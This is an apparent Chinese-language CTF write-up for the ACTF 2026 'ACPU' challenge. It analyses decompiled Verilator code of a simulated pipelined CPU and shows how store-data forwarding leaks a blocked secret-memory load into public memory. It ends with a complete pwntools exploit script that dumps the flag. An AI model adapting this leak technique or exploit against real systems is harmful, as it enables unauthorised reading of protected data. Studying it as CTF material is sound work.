ACPU

这题的Simulation是一个小型 CPU 仿真二进制文件,用 Verilator 将 SystemVerilog 转成 C++ 二进制模拟

先看懂其中核心函数逻辑:

函数:main

int main(int argc, char **argv) {
    VerilatedContext *ctx = new VerilatedContext();
    ctx->commandArgs(argc, argv);

    VCPU *cpu = new VCPU(ctx, "Simulation");

    // Verilator 的主循环:不断推进一个时隙,直到没有挂起事件。
    while (!ctx->gotFinish()) {
        cpu->eval_step();
        if (cpu->eventsPending()) {
            ctx->time(cpu->nextTimeSlot());
        }
    }

    delete cpu;
    delete ctx;
    return 0;
}

函数:VCPU___024root___eval_initial__TOP(读取输入文件并初始化 cache/RAM 状态)

void eval_initial_top(Root *root) {
    VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);
    VL_READMEM_N(true, 32, 0x100, "flag.mem", root->mem_array_0x63e8);
    memset(root->public_cache_lines, 0, sizeof(root->public_cache_lines));
}

函数:VCPU___024root___nba_sequent__TOP__0(题目核心处理逻辑)

struct Signals {
    uint32_t pc;          // +0x00
    uint32_t insn;        // +0x04
    uint8_t  privileged;  // +0x08
    uint8_t  bad_inst;    // +0x09
    uint8_t  rs1;         // +0x0a
    uint8_t  rs2;         // +0x0b
    uint32_t reg1;        // +0x0c
    uint32_t reg2;        // +0x10
    uint32_t op;          // +0x14
    uint32_t imm;         // +0x18
    uint32_t asel;        // +0x1c
    uint32_t bsel;        // +0x20
    uint32_t selector;    // +0x24
    uint8_t  pcsel;       // +0x28
    uint8_t  flag_zero;   // +0x29
    uint8_t  flag_carry;  // +0x2a
    uint8_t  cond;        // +0x2b
    uint32_t jimm;        // +0x2c
    uint8_t  branch;      // +0x30
    uint8_t  memr;        // +0x31
    uint8_t  memw;        // +0x32
    uint32_t memt;        // +0x34
    uint8_t  wback;       // +0x38
    uint8_t  rd;          // +0x39
    uint64_t wdata;       // +0x40
    uint8_t  sys_wback;   // +0x48
    uint16_t sys_wreg;    // +0x4a
    uint32_t sys_wdata;   // +0x4c
}; // size = 0x58

static inline uint32_t sext8(uint32_t x)  { return (uint32_t)(int32_t)(int8_t)x; }
static inline uint32_t sext16(uint32_t x) { return (uint32_t)(int32_t)(int16_t)x; }

static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
    uint32_t v = raw >> shift;
    switch (memt) {
    case 0: return sext8(v);        // LB
    case 1: return sext16(v);       // LH
    case 2: return v;               // LW
    case 3: return v & 0xff;        // LBU
    case 4: return v & 0xffff;      // LHU
    default: return 0;
    }
}

static inline void write_byte_lane(uint32_t *mem, uint32_t idx, uint8_t shift, uint8_t value) {
    uint32_t mask = ~(0xffu << shift);
    mem[idx] = (mem[idx] & mask) | ((uint32_t)value << shift);
}

// 具体子 case 是 add/sub/xor/or/not/shift/slt/sltu 一类。
static inline uint64_t execute_selector_result(uint32_t op, uint32_t a, uint32_t b) {
    switch (op) {
    case 0:  return (uint64_t)(uint32_t)(a + b);
    case 1:  return (uint64_t)(uint32_t)(a - b);
    case 2:  return (uint64_t)(uint32_t)(a ^ b);
    case 3:  return (uint64_t)(uint32_t)(a | b);
    case 4:  return (uint64_t)(uint32_t)(~b);
    case 5:  return (uint64_t)(uint32_t)(b << (a & 0x1f));
    case 8:  return (uint64_t)(uint32_t)(b >> (a & 0x1f));
    case 9:  return (uint64_t)(uint32_t)(((int32_t)b) >> (a & 0x1f));
    case 10: return (uint64_t)(uint32_t)(((int32_t)b < (int32_t)a) ? 1 : 0);
    case 11: return (uint64_t)(uint32_t)((b < a) ? 1 : 0);
    default: return 0;
    }
}

//这函数就是 CPU 前端的大译码单元,把指令翻译成 pipeline 信号,由于内容过于复杂这里仅说明它的作用。
static inline void decode_frontend_and_build_controls(
    void *root,
    Signals &p0,
    Signals &p1,
    Signals &p2,
    Signals &p3,
    Signals &p4,
    uint32_t fetched_insn,
    uint64_t fetched_pc_and_insn)
{
    // 它会做这些事:
    // 1. 从 p3 / p4 / 当前 fetched_insn 里生成 rs1/rs2/imm/jimm/selector/op/memt/wback/rd/sys_*。
    // 2. 维护 root+0x280/0x281/0x28d/0x28e/0x28f/0x290/0x291 这些控制位。
    // 3. 维护 root+0x314/0x318/0x31c 这组前端/立即数临时槽位。
    //
    // 这里只保留它真实的输入输出边界。
    (void)root;
    (void)p0; (void)p1; (void)p2; (void)p3; (void)p4;
    (void)fetched_insn; (void)fetched_pc_and_insn;
}

void step_core_logic(Root *root) {
    Signals &p0 = *(Signals *)((char *)root + 0x018);
    Signals &p1 = *(Signals *)((char *)root + 0x070);
    Signals &p2 = *(Signals *)((char *)root + 0x0c8);
    Signals &p3 = *(Signals *)((char *)root + 0x120);
    Signals &p4 = *(Signals *)((char *)root + 0x178);
    Signals &p5 = *(Signals *)((char *)root + 0x1d0);
    Signals &p6 = *(Signals *)((char *)root + 0x228);

    Signals next_p0 = p0;
    Signals next_p1 = p1;
    Signals next_p2 = p2;
    Signals next_p3 = p3;
    Signals next_p4 = p4;
    Signals next_p5 = p5;
    Signals next_p6 = p6;

    uint32_t next_fetch_pc = root->field_0x320;
    uint8_t next_delay_a = root->byte_0x294;
    uint8_t next_delay_b = root->byte_0x293;

    bool secret_access = false;
    bool public_access = false;
    bool illegal_load = false;
    bool illegal_store = false;
    bool cache_hit = false;
    bool public_fill_line = false;
    bool miss_active = false;
    bool public_miss = false;

    bool take_secret_write = false;
    bool take_public_byte_write = false;
    bool take_public_half_write = false;
    bool take_public_word_write = false;

    uint32_t raw_mem_word = 0;
    uint32_t selected_public_word = 0;
    uint32_t public_line_base = 0;
    uint32_t public_word_index = 0;

    uint16_t secret_index = 0;
    uint16_t public_index_byte = 0;
    uint16_t public_index_half = 0;
    uint16_t public_index_word = 0;
    uint8_t public_byte_shift = 0;
    uint8_t public_half_shift = 0;
    uint8_t public_word_shift = 0;
    uint8_t public_byte_value = 0;
    uint8_t public_half_value = 0;
    uint8_t public_word_value = 0;

    // ----------------------------------------------------------------
    // 1. reset / power-on path
    // ----------------------------------------------------------------
    if (root->byte_0x14) {
        root->field_0x32c = 0x20;
        root->field_0x350 = 0x1000000010ULL;
        root->field_0x308 = 0;

        memset((char *)root + 0x2368, 0, 0x60);
        memset((char *)root + 0x27740, 0, 0x80);
        memset((char *)root + 0x277c0, 0, 0x40);
        memset((char *)root + 0x27810, 0, 0x3e0);

        next_p0 = {};
        next_p1 = {};
        next_p2 = {};
        next_p3 = {};
        next_p4 = {};
        next_p5 = {};
        next_p6 = {};
        next_p0.memt = 4;

        root->field_0x340 = 0;
        root->field_0x34c = 0;
        root->byte_0x28f = 0;
        root->byte_0x290 = 0;
        root->byte_0x291 = 0;
        root->byte_0x292 = 0;
        goto commit_all;
    }

    // ----------------------------------------------------------------
    // 2. 上一拍 public fill 的 line 快照
    // ----------------------------------------------------------------
    if (root->byte_0x291) {
        root->field_0x354 = 0x10;
        public_line_base = (uint32_t)(root->qword_0x1c0 >> 10);
        public_word_index = (uint32_t)((root->qword_0x1c0 >> 6) & 0xf);
        memcpy((char *)root + 0x70, (char *)root + 0x27740, 0x40);
        public_fill_line = true;
    } else {
        memset((char *)root + 0x70, 0, 0x40);
        public_fill_line = false;
    }

    // ----------------------------------------------------------------
    // 3. PC / cycle / delay 状态推进
    // ----------------------------------------------------------------
    if ((root->byte_0x13 & 1) == 0) {
        next_fetch_pc += 4;
        if (root->byte_0x1f8) {
            next_fetch_pc = root->field_0x204;
        }
    }
    root->field_0x308++;

    if (root->byte_0x295) {
        next_delay_a = 2;
        next_delay_b = 1;
    } else if (next_delay_b) {
        if (next_delay_a) next_delay_a = (next_delay_a - 1) & 3;
        else next_delay_b = 0;
    }

    // ----------------------------------------------------------------
    // 4. public / secret 访存分流
    // ----------------------------------------------------------------
    {
        uint32_t addr = (uint32_t)root->qword_0x1c0;
        uint32_t region = addr >> 30;

        if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
            if (region == 0) {
                public_access = true;

                if (root->byte_0x28d & 0x2) {
                    public_byte_shift = 8;
                    public_index_byte = (addr >> 2);
                    public_byte_value = (uint8_t)(root->store_word >> 8);
                    if (public_index_byte <= 0x83d5) take_public_byte_write = true;
                }
                if (root->byte_0x28d & 0x4) {
                    public_half_shift = 16;
                    public_index_half = (addr >> 2);
                    public_half_value = (uint8_t)(root->store_word >> 16);
                    if (public_index_half <= 0x83d5) take_public_half_write = true;
                }
                if (root->byte_0x28d & 0x8) {
                    public_word_shift = (addr >> 24) & 0xff;
                    public_index_word = (addr >> 2) & 0xffff;
                    public_word_value = public_word_shift;
                    if (public_index_word <= 0x83d5) take_public_word_write = true;
                }

                if (root->load_enable_from_stage4) {
                    uint8_t line = (addr >> 6) & 0xf;
                    uint32_t line_tag = addr >> 10;

                    cache_hit =
                        (root->public_cache_tag[line] == line_tag) &&
                        root->public_cache_valid[line];

                    root->byte_0x292 = cache_hit;

                    if (cache_hit) {
                        selected_public_word = root->public_cache_data_0x27810[(line << 4) + ((addr >> 2) & 0xf)];
                    } else {
                        selected_public_word = root->public_mem_0x67e8[addr >> 2];
                    }

                    root->field_0x348 = selected_public_word;
                }
            } else if (region == 2) {
                secret_access = true;
                secret_index = (addr >> 2) & 0x3f;

                raw_mem_word = root->secret_mem_0x63e8[secret_index];
                root->field_0x340 = raw_mem_word;

                illegal_load  = root->load_enable_from_stage4  && !root->byte_0x290;
                illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

                if (root->secret_store_enable && !illegal_store) {
                    take_secret_write = true;
                }
            }
        }

        if (region == 0) {
            raw_mem_word = root->field_0x348;
            root->field_0x340 = raw_mem_word;
        }

        root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
        if (illegal_load) root->byte_0x231 = 1;
    }

    // ----------------------------------------------------------------
    // 5. 取指
    // ----------------------------------------------------------------
    if ((p0.memt != 4) || p0.bad_inst) {
        root->field_0x30c = (uint64_t)0x13 << 32;
    } else if ((root->byte_0x13 & 1) == 0) {
        root->field_0x30c = next_fetch_pc;
        root->field_0x310 = root->rom_words_0x368[(next_fetch_pc >> 2) & 0x7ff];
    }

    // ----------------------------------------------------------------
    // 6. public fill / RAM 写回 side effect
    // ----------------------------------------------------------------
    if (public_fill_line) {
        uint8_t line = ((uint32_t)root->qword_0x1c0 >> 6) & 0xf;
        root->public_cache_valid[line] = 1;
        root->public_cache_tag[line] = public_line_base;
    }

    if (take_secret_write) {
        root->secret_mem_0x63e8[secret_index] = root->secret_store_value;
    }
    if (take_public_byte_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_byte, public_byte_shift, public_byte_value);
    }
    if (take_public_half_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_half, public_half_shift, public_half_value);
    }
    if (take_public_word_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_word, public_word_shift, public_word_value);
    }

    // ----------------------------------------------------------------
    // 7. 前端译码 / 立即数 / 控制信号生成
    // ----------------------------------------------------------------
    decode_frontend_and_build_controls(
        root, next_p0, next_p1, next_p2, next_p3, next_p4,
        root->field_0x310, root->field_0x30c);

    // ----------------------------------------------------------------
    // 8. p1 -> p2 推进,并补写 reg1 / imm
    // ----------------------------------------------------------------
    next_p2 = p1;
    next_p2.reg1 = root->field_0x314;
    next_p2.imm  = root->field_0x31c;

    // ----------------------------------------------------------------
    // 9. ALU / execute 结果
    // ----------------------------------------------------------------
    root->field_0x360 = execute_selector_result(p3.op, p3.reg1, p3.reg2);

    // ----------------------------------------------------------------
    // 10. p3 的 execute result 写进 p5
    // root+0x210/0x211/0x218/0x220/0x222/0x224 就是 p5.{wback,rd,wdata,sys_wback,sys_wreg,sys_wdata}
    // ----------------------------------------------------------------
    {
        uint64_t exec64 = root->field_0x360;
        uint32_t exec32 = (uint32_t)exec64;
        uint8_t exec_hi = (uint32_t)(exec64 >> 32);

        next_p5.rd = root->exec_rd_temp;
        next_p5.wdata = exec64;

        if (p3.sys_wback) {
            next_p5.wback = (exec32 == 0);
            next_p5.sys_wback = 1;
            next_p5.sys_wreg = p3.imm & 0xfff;
            next_p5.sys_wdata = root->exec_sys_value;
        } else {
            next_p5.wback = (p3.wback & 1);
            next_p5.sys_wback = 0;
            next_p5.sys_wreg = 0;
            next_p5.sys_wdata = 0;
        }

        root->byte_0x28b = (exec32 == 0);
        root->byte_0x28c = exec_hi;
        root->byte_0x284 = root->cmp_result_kind;
    }

    // ----------------------------------------------------------------
    // 11. p4 -> p6 推进
    // ----------------------------------------------------------------
    next_p6 = p4;
    root->field_0x204 = root->branch_target_temp;
    root->byte_0x1f8 = root->branch_taken_temp;
    root->byte_0x1f9 = root->branch_zero_temp;
    root->byte_0x1fa = root->branch_carry_temp;

    // ----------------------------------------------------------------
    // 12. 关键后半段:load 结果写进 p6.wdata
    // ----------------------------------------------------------------
    next_p6.wdata = root->field_0x34c;

    // illegal_load 不会阻止数据进入 p6.wdata;
    // 它拦的是最终写回
    if (root->byte_0x28f || root->late_kill_flag) {
        next_p6.wback = 0;
    }

    // secret_access / late kill 会把目的寄存器清掉
    if (root->byte_0x290 || root->late_kill_flag) {
        next_p6.rd = 0;
    }

    // 还会顺手清一组 side flag
    if (root->byte_0x28f || root->late_kill_flag) {
        root->byte_0x268 = 0;
    }

    // ----------------------------------------------------------------
    // 13. 对外可观测状态落地
    // ----------------------------------------------------------------
    root->byte_0x290 = secret_access;
    root->byte_0x291 = public_fill_line;
    root->byte_0x292 = cache_hit;
    root->byte_illegal_load = illegal_load;
    root->byte_illegal_store = illegal_store;
    root->byte_public_access = public_access;
    root->byte_miss_active = miss_active;
    root->byte_public_miss = public_miss;
    root->field_public_line_base = public_line_base;
    root->field_public_word_index = public_word_index;

commit_all:
    // ----------------------------------------------------------------
    // 14. 统一提交回 root
    // ----------------------------------------------------------------
    p0 = next_p0;
    p1 = next_p1;
    p2 = next_p2;
    p3 = next_p3;
    p4 = next_p4;
    p5 = next_p5;
    p6 = next_p6;

    root->field_0x320 = next_fetch_pc;
    root->byte_0x294 = next_delay_a;
    root->byte_0x293 = next_delay_b;
}

这题的外层run.py的逻辑就是把用户输入的base64内容解码从 rom_file.mem的0x100位置写入,最大len为0x800,并且把flag.txt的内容存入 flag.mem,然后运行Simulation。

从VCPU___024root___eval_initial__TOP里我们可以看到,初始化时会把flag.mem读进root + 0x63e8数组,在VCPU___024root___nba_sequent__TOP__0里对应的是secret_mem_0x63e8,会把rom_file.mem读进root->mem_array_0x368,在VCPU___024root___nba_sequent__TOP__0里对应的是rom_words_0x368。

也就是flag被存在Secret RAM里,我们要想办法从里面读取数据。

所以我们先看VCPU___024root___nba_sequent__TOP__0里的读取逻辑,也就是"4.public / secret 访存分流"那部分

    // ----------------------------------------------------------------
    // 4. public / secret 访存分流
    // ----------------------------------------------------------------
    {
        uint32_t addr = (uint32_t)root->qword_0x1c0;
        uint32_t region = addr >> 30;

        if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
            ......
            else if (region == 2) {
                secret_access = true;
                secret_index = (addr >> 2) & 0x3f;

                raw_mem_word = root->secret_mem_0x63e8[secret_index];
                root->field_0x340 = raw_mem_word;

                illegal_load  = root->load_enable_from_stage4  && !root->byte_0x290;
                illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

                if (root->secret_store_enable && !illegal_store) {
                    take_secret_write = true;
                }
            }
        }
        root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
        if (illegal_load) root->byte_0x231 = 1;
    }

if ((~root->mem_req_mask) & root->mem_req_enable)

  • root->mem_req_enable → 内存请求有效位(load/store 请求是否发出)
  • root->mem_req_mask → 内存请求屏蔽位(屏蔽某些请求)
  • ~root->mem_req_mask → 取反,得到允许的 bit 位
  • 条件成立:
    • 同时满足:请求有效,并且没有被屏蔽

uint32_t addr = root->cached_public_addr_0x1c0;

取出这次访存地址

uint32_t region = addr >> 30; if (region == 2)

这里是用地址高位判断访问区域:

  • region == 0:public 区
  • region == 2:secret 区

secret_index = (addr >> 2) & 0x3f;

  • 地址先右移 2 位,代表按word访问(因为 CPU 内存是按word(32-bit对齐访问,一个word = 4字节所以地址右移 2 位,把 byte 地址转换成 word 地址)
  • 再取低 6 位,说明secret 区一共按64 个word 编址(索引范围 0~63)

raw_mem_word = root->secret_mem_0x63e8[secret_index];

  • 按刚算出来的 secret_index
  • 从 secret_mem_0x63e8 里读一个 32-bit word
  • 放进 raw_mem_word

这一步已经把secrect RAM的内容取出来了

root->field_0x340 = raw_mem_word;

把secrect RAM的内容转移到 root->field_0x340

illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;

这句是在判断:这次 secret 访问是不是非法的 load。

  • root->load_enable_from_stage4
    表示当前这拍的这次 secret 访存,其实是一个 load
  • !root->byte_0x290
    表示当前不具备访问 secret 的权限

所以这句的含义就是:如果当前是在做一次 load,而且当前没有 secret 权限,那么这次就是 illegal load。

illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

这句和上一句完全类似,只不过它判断的是:这次 secret 访问是不是非法的 store。

也就是:

  • 如果这次是 store
  • 并且没有 secret 权限
  • 那就把 illegal_store 置真

if (root->secret_store_enable && !illegal_store) {

意思是:

  • 如果当前这次操作本来就打算往 secret RAM 写
  • 并且这次写不是非法的

那就允许它进入真正的写回阶段。

take_secret_write = true;

这句不是立刻写 RAM,意思是:

  • 先记一个“待写回”的标志
  • 稍后在统一提交阶段,才真正把值写进 secret_mem_0x63e8

root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);

意思是:

  • 不管前面 raw_mem_word 是从 public 还是 secret 来的
  • 现在都统一拿 root->field_0x340
  • 根据 load 类型 p4.memt
  • 再根据字内偏移 root->byte_0x28e
  • 生成最终的 load 结果
  • 存进 root->field_0x34c

也就是:

  • 0x340 是原始 32-bit word
  • 0x34c 是 CPU 真正整理好的 load 返回值

if (illegal_load) root->byte_0x231 = 1;

这句是在记录一个异常/违规标志。

意思是:

  • 如果刚才判定这是一次非法 load
  • 就把 root->byte_0x231 置 1

也就是给后面的异常处理/kill 逻辑打一个标记:这拍发生了 illegal load。

我们现在看 extract_load_result()是怎么处理的:

static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
    uint32_t v = raw >> shift;
    switch (memt) {
    case 0: return sext8(v);        // LB
    case 1: return sext16(v);       // LH
    case 2: return v;               // LW
    case 3: return v & 0xff;        // LBU
    case 4: return v & 0xffff;      // LHU
    default: return 0;
    }
}

第一步:

uint32_t v = raw >> shift;

这一步是在做“字内选字节/半字”。

比如一个 raw_mem_word 是:

[b3 b2 b1 b0]

如果:

  • shift = 0,取最低字节开始
  • shift = 8,相当于把第二个字节移到最低位
  • shift = 16,取第三个字节
  • shift = 24,取第四个字节

所以它是在从一个 32-bit word 里抽真正要load的那一部分。

第二步:按 load 类型解释
memt 决定这是哪种 load:

  • 0 -> LB
  • 1 -> LH
  • 2 -> LW
  • 3 -> LBU
  • 4 -> LHU

对应行为:

case 0: return sext8(v);

取低 8 位,并做符号扩展

case 1: return sext16(v);

取低 16 位,并做符号扩展

case 2: return v;

直接返回 32 位 word

case 3: return v & 0xff;

取低 8 位,但不符号扩展

case 4: return v & 0xffff;

取低 16 位,但不符号扩展

所以如果题目用的是 lw,那这一层几乎没有损失。

我们继续追踪field_0x34c:

    // ----------------------------------------------------------------
    // 12. 关键后半段:load 结果写进 p6.wdata
    // ----------------------------------------------------------------
    next_p6.wdata = root->field_0x34c;

    // illegal_load 不会阻止数据进入 p6.wdata;
    // 它拦的是最终写回
    if (root->byte_0x28f || root->late_kill_flag) {
        next_p6.wback = 0;
    }

    // secret_access / late kill 会把目的寄存器清掉
    if (root->byte_0x290 || root->late_kill_flag) {
        next_p6.rd = 0;
    }

    // 还会顺手清一组 side flag
    if (root->byte_0x28f || root->late_kill_flag) {
        root->byte_0x268 = 0;
    }

next_p6.wdata = root->field_0x34c;

意思是:

  • field_0x34c 是整理好的 load 结果
  • 现在它被放进 p6.wdata
  • p6 是最后一级的那组 Signals

也就是说,到这里为止,secret 数据已经不是停留在 memory 子系统里,而是已经进入写回级数据槽了。

if (root->byte_0x28f || root->late_kill_flag) { next_p6.wback = 0; }

意思是:

  • 如果发生了 illegal_load 这类 kill 条件
  • 那就把 p6.wback 清零

wback 是一个是否要写入的标记位,代表最终要不要真的把 wdata 写进寄存器堆,清零就代表:

  • wdata 还在
  • 但“不允许正式提交”

if (root->byte_0x290 || root->late_kill_flag) { next_p6.rd = 0; }

意思是:

  • 如果是 secret 访问或者进入某个 kill 状态
  • 那就把目标寄存器号清成 0

所以这句是在进一步保证:

这次非法得到的 load 结果,不会以“正常寄存器写回”的形式保留下来。

if (root->byte_0x28f || root->late_kill_flag) { root->byte_0x268 = 0; }

条件如上,也是非法时清空,对解题不太重要

我们现在可以总结一下了:

secret RAM的内容可以被读出来存进 p6.wdata,但是最后 wback 被清零,rd 也被抹掉

也就是:

  • 数据路径是通的
  • 只是最终提交被拦了

那下一步该怎么做呢,我们要先了解一下CPU Forwarding:

假设一个简单的 5 级流水线 CPU(Fetch → Decode → Execute → Memory → Writeback),有这样两条指令:

1. add r1, r2, r3   ; r1 = r2 + r3
2. sub r4, r1, r5   ; r4 = r1 - r5
  • 问题:第二条指令需要用到 r1 的值,但 r1 还没写回到寄存器堆(Writeback 阶段还没到)
  • 直接从寄存器堆读会得到旧值 → 数据冒险

Forwarding 的核心思路是:

  • 不用等寄存器写回
  • 直接从 pipeline 中 上一条指令的中间阶段(ALU 输出 / memory 输出) 拿数据给下一条指令

举例:

EX stage of add r1 = ALU_out
EX stage of sub r4 = get r1 from previous EX stage instead of regfile
  • 这样第二条指令就能立即拿到正确的 r1 值,而不需要停顿

Forwarding 的典型路径:

来源阶段 目的阶段 说明
EX / MEM EX ALU 结果直接给下一条指令的 ALU 使用
MEM EX Load 结果给下一条指令 ALU 使用(load-use hazard)
MEM / WB MEM 写回数据给 memory store 使用

我们如果这样操作:

words += li32(5, 0x80000000)
words.append(lw(7, 0, 5))
words.append(sw(7, 0, 0))
words.append(lw(10, 0, 0))
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))

对应的汇编逻辑是:

li32 t0, 0x80000000
lw   t2, 0(t0)
sw   t2, 0(x0)
lw   a0, 0(x0)
li32 t1, 0x2000
jalr x0, 0(t1)

1. 0x80000000 是什么:

这是 secret 区的基址。

我们前面已经从 step_core_logic 里确认过,访存时会先做:

region = addr >> 30;

然后:

  • region == 0:public 区
  • region == 2:secret 区

而:

0x80000000 >> 30 = 2

因为 0x80000000 的最高两位是 10

所以把地址设成 0x80000000,就是在访问 secret RAM 的第 0 个 word。
也就是 flag 开头那 4 个字节所在的位置。

2. 5、7、10 代表什么:

这些是寄存器编号。

RISC-V 有 32 个通用寄存器:

  • x0x31

其中一些有 ABI 别名,常用的是:

  • x5 = t0
  • x6 = t1
  • x7 = t2
  • x10 = a0

特殊地,x0 是RISC-V里永远为 0 的寄存器,写进去的值会被丢掉

3.具体流程:

按顺序看:

第一步

li32 t0, 0x80000000

t0 设成 secret 基址。

所以:

t0 = 0x80000000

第二步

lw t2, 0(t0)

0x80000000 读一个 32-bit word。

这里实际读到的是 flag 的前 4 个字节,也就是:

'A' 'C' 'T' 'F'

按小端拼成 32 位数就是:

0x46544341

但是这次 load 属于非法 secret load,所以:

  • 数据内部其实已经读出来了
  • 可最后不会正常提交到 t2/x7

所以最后可以看到:

x7 = 0x00000000

第三步

sw t2, 0(x0)

它按正常语义是:

*(uint32_t *)0x0 = t2

这里的 t2 不是从寄存器堆里慢慢等出来的,而是 store-data 走了 forwarding。

也就是说:

  • 前一条 lw 虽然没最终写回 x7
  • 但它的结果已经在流水线内部
  • sw 紧跟着来取 store-data 时,直接从 forwarding 拿到了那份 secret word

于是 public 地址 0x0 被写成了:

0x46544341

第四步

lw a0, 0(x0)

这次是从 public 地址 0x0 正常读。

所以它不会触发 secret 权限检查,能合法读回:

x10 = 0x46544341

第五步

li32 t1, 0x2000
jalr x0, 0(t1)

x0无法写入,这里表示不保存返回地址到寄存器,直接跳到 0x2000 正常结束,让模拟器把寄存器打出来,这时候x10里面就是flag的前4字节内容了。

这里0x2000这个结束地址可以通过VCPU___024root___eval_initial__TOP里的VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);看出来,整个ROM的大小为0x800 * 4 = 0x2000 bytes,0x2000大概率是结束指令,实际测试可以发现确实是。

然后就是循环四字节取遍flag就行了。

EXP:

from pwn import *
from zenpwnpy import *
context.terminal = ['tmux', 'splitw', '-h']
target = ''

file_name = './Simulation'

elf = ELF(file_name)
context.binary = elf
context.gdb_binary = "pwndbg"

gdb_   = 1 if ('gdb' in sys.argv)        else 0
switch = 1 if ('remote' in sys.argv)     else 0
debug  = 0 if ('deoff'  in sys.argv)     else 1
error  = 1 if ('error'  in sys.argv)     else 0

if debug:
    context(log_level='debug')

if error:
    context(log_level='error')

bps = [
# 0x1234,
# 'main',
# (0xe3b31, 'libc'), 
# ('system', 'libc')
]

gdb_cmd = ''
if gdb_ and switch == 0:
    gdb_cmd += "set breakpoint pending on\n"
    for b in bps:
       if isinstance(b, int):
           gdb_cmd += f"breakrva {hex(b)}\n"
       elif isinstance(b, str):
           gdb_cmd += f"b {b}\n"
    gdb_cmd += "c\n"

if switch:
   parts = target.replace(':', ' ').split()
   host = parts[-2]
   port   = int(parts[-1])
   use_ssl = '--ssl' in parts
   p = remote(host, port, ssl=use_ssl, sni=host if use_ssl else None)
elif gdb_:
   p = gdb.debug(file_name, gdbscript=gdb_cmd, aslr=True)
else:
   path = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin/run.py"
   workspace = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin"
   p = process(["python3", path],cwd=workspace)

def s(data):             return p.send(data)
def sa(delim, data):     return p.sendafter(delim, data)
def sl(data):            return p.sendline(data)
def sla(delim, data):    return p.sendlineafter(delim, data)
def r(numb=4096):        return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
def rl(bool):            return p.recvline(keepends=bool)
def ra(t=None):          return p.recvall(timeout=t)
def rn(numb):            return p.recvn(numb)
def cl():                return p.close()
def it():                return p.interactive()
def uc64(data):          return u64(data.rjust(8, b'\x00'))
def uu64(data):          return u64(data.ljust(8, b'\x00'))
def addr(off):           return lg(hex(off), (ret := elf.address + off)) or ret
def cb(data):            return data if isinstance(data, bytes) else str(data).encode()
def lg(name, data):      return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
def bl(address):         return (address).to_bytes(3, 'big')
def bt(*values):         return bytes([v & 0xff for v in values])
def ntpie(leak, offset, name='PIE'):  return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
def base(val, binary=elf):            return binary.address + val  
def fill(num, content=b'A'):          return (content.encode() if isinstance(content, str) else content) * num
def se(s): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next(elf.search(s if isinstance(s, bytes) else s.encode())))) or addr
def shn(target, current_printed):     return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed):    return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]

_rop_cache = {}
def gg(s):
   target = elf
   if target not in _rop_cache:
       _rop_cache[target] = ROP(target)
   rop = _rop_cache[target]
   instrs = [x.strip() for x in s.split(';')]
   if (gadget := rop.find_gadget(instrs)):
       lg(s, gadget.address)
       return gadget.address
   else:
       raise ValueError(f"[-] Critical: Gadget not found: {s}")

def ga(delim=b'|', name='Leak', data=None):
    target_data = p.recv(data) if isinstance(data, int) else (data if data else ru(delim))
    if isinstance(target_data, str):
        target_data = target_data.encode()
    hex_list = re.findall(b'0x[0-9a-fA-F]+', target_data)
    return [lg(f'{name}[{i}]', x) or x for i, x in enumerate([int(a, 16)for a in hex_list])]
#################################################################################

words = []
words += li32(5, 0x80000000)

for i in range(16):
    words.append(lw(7, i * 4, 5))     
    words.append(sw(7, 0, 0))        
    words.append(lw(10 + i, 0, 0)) 
      
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))
payload = pack_words(words)
sla(b"give me your code:\n", base64.b64encode(payload))
out = ru(b"give me your code:\n").decode(errors="ignore")
regs = {}
for m in re.finditer(r"x(\d+)\s*=\s*0x([0-9a-fA-F]{8})", out):
    regs[int(m.group(1))] = int(m.group(2), 16)
leak = b""
for reg in range(10, 26):
    leak += regs[reg].to_bytes(4, "little")
print(leak)
it()


题目链接:CTF-Writeups/ACTF 2026/ACPU at main · Zenquiem/CTF-Writeups


ACPU
https://zenquietus.top/archives/wei-ming-ming-wen-zhang-FHedRCvO
作者
ZenDuk
发布于
2026年05月17日
许可协议